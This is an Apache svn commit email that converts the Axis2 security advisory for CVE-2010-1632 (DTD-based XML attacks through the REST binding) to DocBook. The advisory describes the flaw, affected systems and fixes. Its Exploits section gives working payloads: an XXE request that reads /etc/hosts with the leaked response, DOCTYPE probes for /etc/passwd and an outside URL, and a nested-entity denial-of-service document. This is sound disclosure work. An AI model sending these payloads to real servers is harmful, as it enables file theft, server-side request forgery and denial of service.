You are viewing a plain text version of this content. The canonical link for it is here.
Posted to java-commits@axis.apache.org by ve...@apache.org on 2010/06/27 09:51:38 UTC
svn commit: r958346 - in /axis/axis2/java/core/security: CVE-2010-1632.docx
advisory-cve-2010-1632/ advisory-cve-2010-1632/pom.xml
advisory-cve-2010-1632/src/ advisory-cve-2010-1632/src/docbkx/
advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
Author: veithen
Date: Sun Jun 27 07:51:38 2010
New Revision: 958346
URL: http://svn.apache.org/viewvc?rev=958346&view=rev
Log:
CVE-2010-1632: Converted the advisory document to Docbook (instead of MS Word).
Added:
axis/axis2/java/core/security/advisory-cve-2010-1632/ (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/src/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml (with props)
Removed:
axis/axis2/java/core/security/CVE-2010-1632.docx
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/
------------------------------------------------------------------------------
--- svn:ignore (added)
+++ svn:ignore Sun Jun 27 07:51:38 2010
@@ -0,0 +1 @@
+target
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
URL: http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml?rev=958346&view=auto
==============================================================================
--- axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (added)
+++ axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml Sun Jun 27 07:51:38 2010
@@ -0,0 +1,62 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+ <parent>
+ <groupId>org.apache</groupId>
+ <artifactId>apache</artifactId>
+ <version>7</version>
+ </parent>
+ <groupId>org.apache.axis2</groupId>
+ <artifactId>advisory-cve-2010-1632</artifactId>
+ <version>1</version>
+ <name>Axis2 Security Advisory CVE-2010-1632</name>
+ <packaging>pom</packaging>
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>com.agilejava.docbkx</groupId>
+ <artifactId>docbkx-maven-plugin</artifactId>
+ <version>2.0.10</version>
+ <executions>
+ <execution>
+ <goals>
+ <goal>generate-pdf</goal>
+ </goals>
+ <phase>compile</phase>
+ <configuration>
+ <includes>CVE-2010-1632.xml</includes>
+ <sectionAutolabel>1</sectionAutolabel>
+ </configuration>
+ </execution>
+ </executions>
+ <dependencies>
+ <dependency>
+ <groupId>org.docbook</groupId>
+ <artifactId>docbook-xml</artifactId>
+ <version>4.4</version>
+ <scope>runtime</scope>
+ </dependency>
+ </dependencies>
+ </plugin>
+ </plugins>
+ </build>
+</project>
\ No newline at end of file
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
------------------------------------------------------------------------------
svn:eol-style = native
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
URL: http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml?rev=958346&view=auto
==============================================================================
--- axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml (added)
+++ axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml Sun Jun 27 07:51:38 2010
@@ -0,0 +1,479 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.4//EN" "http://www.oasis-open.org/docbook/xml/4.4/docbookx.dtd">
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<article>
+ <articleinfo>
+ <title>Apache Axis2 Security Advisory (CVE-2010-1632)</title>
+ <subtitle>HTTP binding (REST) enables DTD based XML attacks</subtitle>
+ <author>
+ <firstname>Andreas</firstname>
+ <surname>Veithen</surname>
+ <email>veithen@apache.org</email>
+ </author>
+ <releaseinfo>First version: May 16, 2010 ⢠First published: June 13, 2010 ⢠Last updated: June 13, 2010</releaseinfo>
+ </articleinfo>
+ <section>
+ <title>Description</title>
+ <para>
+ According to the SOAP 1.1 specification, <quote>A SOAP message MUST NOT contain a
+ Document Type Declaration.</quote> In Axis2, this constraint is enforced by the
+ <classname>StAXSOAPModelBuilder</classname> class, which is part of Axiom. This
+ approach presents two issues:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ It only works for SOAP bindings. HTTP bindings supporting plain XML messages
+ still allow document type declarations in request messages.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ When processing a document with a document type declaration,
+ <classname>StAXSOAPModelBuilder</classname> only reports an error after
+ receiving the DTD event from the StAX parser. However, at this point,
+ the StAX parser may already have processed (part of) the document type declaration.
+ </para>
+ </listitem>
+ </itemizedlist>
+ <para>
+ This implies that Axis2 is vulnerable to DTD based XML attacks. There are two types of such attacks:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ Document type declarations may reference other documents, namely a DTD or
+ external entities declared in the internal subset. If the XML parser is
+ configured with a default entity resolver (which is the case for Axis2), this
+ allows an attacker to instruct the parser to access arbitrary files. Since URLs
+ may be used as system IDs, this includes remote resources accessible only in the
+ network where the server is deployed. An attacker may exploit this in several ways:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ By inspecting the error message in the service response, he may be able to
+ scan for the presence of certain files on the local file system of the server
+ or for the availability of certain network resources accessible to the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ By including an internal subset in the document type declaration of the
+ request and using external entity declarations, he may be able to include
+ the content of arbitrary files (local to the server) in the request.
+ There are many services that produce responses that include information
+ from the request message (either as part of a normal response or a SOAP fault).
+ By carefully crafting the request, the attacker may thus be able to retrieve
+ the content of arbitrary files from the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ Using URLs with the âhttpâ scheme, the attacker may use the vulnerability
+ to let the server execute arbitrary HTTP GET requests and attack other
+ systems that have some form of trust relationship with the Axis2 server.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </listitem>
+ <listitem>
+ <para>
+ While XML does not allow recursive entity definitions, it does permit nested
+ entity definitions. If a document has very deeply nested entity definitions,
+ parsing that document can result in very high CPU and memory consumption during
+ entity expansion. This produces the potential for Denial of Service attacks.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </section>
+ <section>
+ <title>Systems affected</title>
+ <section id="axis2-affected">
+ <title>Axis2 deployments</title>
+ <para>
+ As shown in <xref linkend="solutions"/>, all Axis2 installations with versions
+ prior to 1.6 are to some extend vulnerable. The most vulnerable installations
+ are those on which at least one service is deployed that has an HTTP binding
+ accepting messages with content type <literal>application/xml</literal>, i.e.
+ for which the <literal>disableREST</literal> parameter is set to <literal>false</literal>.
+ Note that this is the default setting.
+ </para>
+ <para>
+ Even deployments with REST disabled are partially vulnerable (see
+ <xref linkend="exploit-url-access"/> and <xref linkend="exploit-dos"/>).
+ In addition, Axis2 deployments that use a StAX implementation other
+ than Woodstox may have additional vulnerabilities also affecting SOAP
+ requests<footnote><para>Woodstox parses the document type declaration lazily,
+ i.e. only when the DTD event is consumed. In this case, the protection in
+ <classname>StAXSOAPModelBuilder</classname> is enough.</para></footnote>.
+ </para>
+ <para>
+ Note that all types of Axis2 deployments are affected by these vulnerabilities.
+ This includes standalone deployments, deployments using the WAR distribution
+ as well as Web applications embedding Axis2.
+ </para>
+ </section>
+ <section>
+ <title>Other products</title>
+ <para>
+ Axis2 is used in (or as the basis for) other products. This includes the Synapse,
+ ODE, Tuscany and Geronimo projects from the ASF, as well as several commercial
+ products. It is likely that these products are vulnerable as well.
+ </para>
+ <para>
+ It is possible that Web service frameworks other than Axis2 are affected by
+ similar vulnerabilities.
+ </para>
+ <para>
+ The exploits described in <xref linkend="exploits"/> may be used to check
+ whether a given product is vulnerable.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>Impact assessment</title>
+ <para>
+ The vulnerability described in this advisory may allow an attacker to read
+ arbitrary files on the file system of the node where Axis2 runs, provided that
+ the account running the Axis2 instance has access to these files and that
+ Java 2 security is not used to prevent file system access. An attacker may
+ also be able to retrieve unsecured resources from the network if they are
+ reachable from the Axis2 instance with URLs that are recognized by the Java
+ runtime. However, to do so, the attacker needs to create a specially crafted
+ request that requires knowledge about the services deployed on the Axis2
+ instance. Therefore, this vulnerability cannot be exploited in an automated way.
+ </para>
+ <para>
+ The vulnerability may also allow the attacker to check the file system of the
+ server (resp. network resources reachable by the server) for the existence
+ of certain files (resp. resources), as well as to carry out Denial of Service
+ attacks. These attacks donât require knowledge about the services deployed
+ on Axis2 and may thus be exploited using scripting.
+ </para>
+ <para>
+ It is important that all users of Axis2 (and derived products) who have
+ deployments that accept XML messages from untrusted sources take appropriate
+ actions to mitigate the risk caused by the vulnerability described in this
+ advisory. This also applies to users who have secured their installations
+ using WS-Security (Rampart).
+ </para>
+ </section>
+ <section id="solutions">
+ <title>Solutions</title>
+ <para>
+ In order to avoid the vulnerability described in this advisory, apply one of
+ the solutions explained in the following sections.
+ </para>
+ <section>
+ <title>Upgrade to Axis2 1.5.2 or 1.6</title>
+ <para>
+ The security issue described in this advisory is fixed in Axis2 1.5.2 and 1.6.
+ These releases forbid document type declarations even for
+ <literal>application/xml</literal> documents. Therefore upgrading to one of
+ these versions is the best solution. Note that at the date of writing,
+ neither Axis2 1.5.2 nor Axis2 1.6 has been released yet. However,
+ snapshot versions are available.
+ </para>
+ </section>
+ <section id="solution-disable-application-xml">
+ <title>Disable support for the application/xml content type</title>
+ <para>
+ This solution only applies to users who donât need REST support.
+ </para>
+ <para>
+ As explained in <xref linkend="axis2-affected"/>, disabling REST
+ support (using the <literal>disableREST</literal> parameter) partially
+ solves the issue, but still leaves the system vulnerable to some types
+ of attacks. Since the issue is caused by the component responsible for
+ processing messages with content type <literal>application/xml</literal>,
+ the only effective solution is to disable this component. It is
+ configured in <filename>axis2.xml</filename> using the following declaration:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ However, it is <emphasis role="strong">not</emphasis> sufficient to just remove
+ this declaration. The reason is that Axis2 registers
+ <classname>ApplicationXMLBuilder</classname> by default, even if there is
+ no explicit declaration for it in <filename>axis2.xml</filename>. Therefore
+ the only way to disable this component is to override the mapping for the
+ <literal>application/xml</literal> content type with a message builder
+ that doesnât have the same vulnerability. The recommended way is to
+ replace <classname>ApplicationXMLBuilder</classname> by <classname>SOAPBuilder</classname>:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis role="strong">SOAPBuilder</emphasis>"/></programlisting>
+ <para>
+ The effect of this is that messages with content type <literal>application/xml</literal>
+ are no longer processed as plain XML messages, but as SOAP messages.
+ </para>
+ <para>
+ In addition to this configuration change, it is also necessary to make sure that
+ Axis2 uses Woodstox as its StAX implementation. This is the case if
+ <filename>wstx-asl-x.y.z.jar</filename> is in the classpath.
+ </para>
+ </section>
+ <section>
+ <title>Apply a security fix</title>
+ <para>
+ A fix for the issue described in this advisory is available in source code form from the following location:
+ </para>
+ <para>
+ <ulink url="https://svn.apache.org/repos/asf/axis/axis2/java/core/security/secfix-cve-2010-1632"/>
+ </para>
+ <para>
+ It has been successfully tested with Axis2 1.4.1 and 1.5.1. In order to apply the fix,
+ execute the following steps:
+ </para>
+ <procedure>
+ <step>
+ <para>
+ Check out the project from Subversion:
+ </para>
+ <screen>svn co https://svn.apache.org/repos/asf/axis/axis2/java/core/
+security/secfix-cve-2010-1632</screen>
+ </step>
+ <step>
+ <para>
+ Change into the <filename>secfix-cve-2010-1632</filename> directory and
+ build the project using <ulink url="http://maven.apache.org/">Maven</ulink>:
+ </para>
+ <screen>mvn package</screen>
+ </step>
+ <step>
+ <para>
+ Copy the JAR from the <filename>target</filename> folder and add it to
+ the Axis2 classpath. For the standalone distribution, this means adding
+ the JAR to the <filename>lib</filename> folder. For WAR deployments,
+ add it to <filename>WEB-INF/lib</filename>.
+ </para>
+ </step>
+ <step>
+ <para>
+ Open the <filename>axis2.xml</filename> configuration file and locate the
+ following entry:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ Replace <classname>ApplicationXMLBuilder</classname> by
+ <classname>SecureApplicationXMLBuilder</classname>, as shown below:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis role="strong">SecureApplicationXMLBuilder</emphasis>"/></programlisting>
+ <para>
+ Note that in the default <filename>axis2.xml</filename> configuration
+ file shipped with Axis2 1.4.1, the <sgmltag class="element">messageBuilder</sgmltag>
+ entry for <classname>ApplicationXMLBuilder</classname> is duplicated.
+ The second entry must be removed in order for the change to take effect.
+ </para>
+ </step>
+ </procedure>
+ <para>
+ As with the solution described in <xref linkend="solution-disable-application-xml"/>,
+ also check that Woodstox is present in the classpath.
+ </para>
+ </section>
+ </section>
+ <section id="exploits">
+ <title>Exploits</title>
+ <section>
+ <title>Remote file access</title>
+ <para>
+ The vulnerability can be demonstrated using a stock Axis2 1.5.1 distribution into which the
+ SimpleStockQuoteService from the Apache Synapse project has been
+ deployed<footnote><para><ulink url="http://svn.apache.org/repos/asf/synapse/trunk/java/modules/samples/services/SimpleStockQuoteService/"/></para></footnote>.
+ The request that exposes the vulnerability is as follows:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE getQuote [
+ <!ENTITY file SYSTEM "/etc/hosts">
+]>
+<getQuote xmlns="http://services.samples">
+ <request>
+ <symbol xmlns="http://services.samples/xsd">&file;</symbol>
+ </request>
+</getQuote>]]></programlisting>
+ <para>
+ Sending this request to the SimpleStockQuoteService
+ endpoint<footnote><para>http://localhost:8080/axis2/services/SimpleStockQuoteService</para></footnote>
+ using <literal>application/xml</literal> as content type gives the following response:
+ </para>
+<programlisting><![CDATA[<ns:getQuoteResponse xmlns:ns="http://services.samples">
+ <ns:return xsi:type="ax21:GetQuoteResponse"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xmlns:ax21="http://services.samples/xsd">
+ <ax21:change>3.9659262974249048</ax21:change>
+ <ax21:earnings>12.755839004148722</ax21:earnings>
+ <ax21:high>-157.5738168969912</ax21:high>
+ <ax21:last>157.71363587000337</ax21:last>
+ <ax21:lastTradeTimestamp>
+ Sun May 16 14:25:19 CEST 2010
+ </ax21:lastTradeTimestamp>
+ <ax21:low>164.30154930689852</ax21:low>
+ <ax21:marketCap>-4192110.249723876</ax21:marketCap>
+ <ax21:name>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost
+ Company</ax21:name>
+ <ax21:open>-154.31609570318096</ax21:open>
+ <ax21:peRatio>23.935652759459877</ax21:peRatio>
+ <ax21:percentageChange>2.204736746512539</ax21:percentageChange>
+ <ax21:prevClose>179.88207905992505</ax21:prevClose>
+ <ax21:symbol>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost</ax21:symbol>
+ <ax21:volume>7235</ax21:volume>
+ </ns:return>
+</ns:getQuoteResponse>]]></programlisting>
+ <para>
+ As can be seen, the response includes the full content of the
+ <filename>/etc/hosts</filename> file. While this leverages a particular
+ feature of the SimpleStockQuoteService, it is expected that a similar
+ attack can be performed with many real world services.
+ </para>
+ <para>
+ It should also be noted that this attack only works if the
+ <literal>disableREST</literal> parameter (see <filename>axis2.xml</filename>)
+ is set to <literal>false</literal>. If REST is disabled, the attack is no
+ longer possible and the response from the service will be as follows:
+ </para>
+ <programlisting><![CDATA[<faultstring>Http binding is disabled for this service.</faultstring>]]></programlisting>
+ </section>
+ <section id="exploit-url-access">
+ <title>Server file system scan and arbitrary HTTP GET request execution</title>
+ <para>
+ Even when REST is disabled, the vulnerability can still be exploited to
+ check the existence of a particular file on the server file system.
+ Consider the following request (again with content type <literal>application/xml</literal>):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM "/etc/passwd">
+<root/>]]></programlisting>
+ <para>
+ When sent to any valid endpoint, this triggers the following response, assuming that
+ Axis2 is installed on a Unix system:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+Unexpected character '#' (code 35) in external DTD subset;
+expected a '<' to start a directive
+ at [row,col,system-id]: [1,1,"file:/etc/passwd"]
+ from [row,col {unknown-source}]: [1,1]</faultstring>]]></programlisting>
+ <para>
+ On a non Unix system or if the DOCTYPE declaration refers to a non existing
+ file, the response will be different:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+(was java.io.FileNotFoundException) /non_existing_file
+(No such file or directory)
+ at [row,col {unknown-source}]: [1,43]</faultstring>]]></programlisting>
+ <para>
+ By inspecting the response, an attacker can easily determine whether or not
+ a given file exists on the file system of the server.
+ </para>
+ <para>
+ The same technique can also be used to trick Axis2 into executing
+ arbitrary HTTP GET requests (including query parameters):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM "http://www.google.com/search?q=test">
+<root/>]]></programlisting>
+ </section>
+ <section id="exploit-dos">
+ <title>Denial of Service</title>
+ <para>
+ A Denial of Service attack using deeply nested entity definitions can
+ easily be demonstrated using the following request:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root [
+ <!ENTITY x32 "foobar">
+ <!ENTITY x31 "&x32;&x32;">
+ <!ENTITY x30 "&x31;&x31;">
+ <!ENTITY x29 "&x30;&x30;">
+ <!ENTITY x28 "&x29;&x29;">
+ <!ENTITY x27 "&x28;&x28;">
+ <!ENTITY x26 "&x27;&x27;">
+ <!ENTITY x25 "&x26;&x26;">
+ <!ENTITY x24 "&x25;&x25;">
+ <!ENTITY x23 "&x24;&x24;">
+ <!ENTITY x22 "&x23;&x23;">
+ <!ENTITY x21 "&x22;&x22;">
+ <!ENTITY x20 "&x21;&x21;">
+ <!ENTITY x19 "&x20;&x20;">
+ <!ENTITY x18 "&x19;&x19;">
+ <!ENTITY x17 "&x18;&x18;">
+ <!ENTITY x16 "&x17;&x17;">
+ <!ENTITY x15 "&x16;&x16;">
+ <!ENTITY x14 "&x15;&x15;">
+ <!ENTITY x13 "&x14;&x14;">
+ <!ENTITY x12 "&x13;&x13;">
+ <!ENTITY x11 "&x12;&x12;">
+ <!ENTITY x10 "&x11;&x11;">
+ <!ENTITY x9 "&x10;&x10;">
+ <!ENTITY x8 "&x9;&x9;">
+ <!ENTITY x7 "&x8;&x8;">
+ <!ENTITY x6 "&x7;&x7;">
+ <!ENTITY x5 "&x6;&x6;">
+ <!ENTITY x4 "&x5;&x5;">
+ <!ENTITY x3 "&x4;&x4;">
+ <!ENTITY x2 "&x3;&x3;">
+ <!ENTITY x1 "&x2;&x2;">
+]>
+<root attr="&x1;"/>]]></programlisting>
+ <para>
+ When sent with content type <literal>application/xml</literal> to any
+ valid endpoint, this request will cause an out of memory condition
+ on the server. This works even if REST is disabled. The reason is that
+ before checking if the request is acceptable, Axis2 needs to parse
+ the start tag of the document element. The expansion of the entity
+ used in the attribute on this element will then cause an out of memory error.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>References</title>
+ <para>
+ The issue that causes the vulnerability exposed in the present advisory was
+ initially described in JIRA report
+ AXIS2-4450<footnote><para><ulink url="https://issues.apache.org/jira/browse/AXIS2-4450"/></para></footnote>.
+ </para>
+ </section>
+ <section>
+ <title>Contact</title>
+ <para>
+ Please send all security relevant comments (e.g. about additional
+ vulnerabilities not identified by this advisory) to <email>security@apache.org</email>.
+ Questions and comments that are not security relevant may be sent to
+ the public <email>java-dev@axis.apache.org</email> mailing list.
+ </para>
+ </section>
+</article>
\ No newline at end of file
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
------------------------------------------------------------------------------
svn:eol-style = native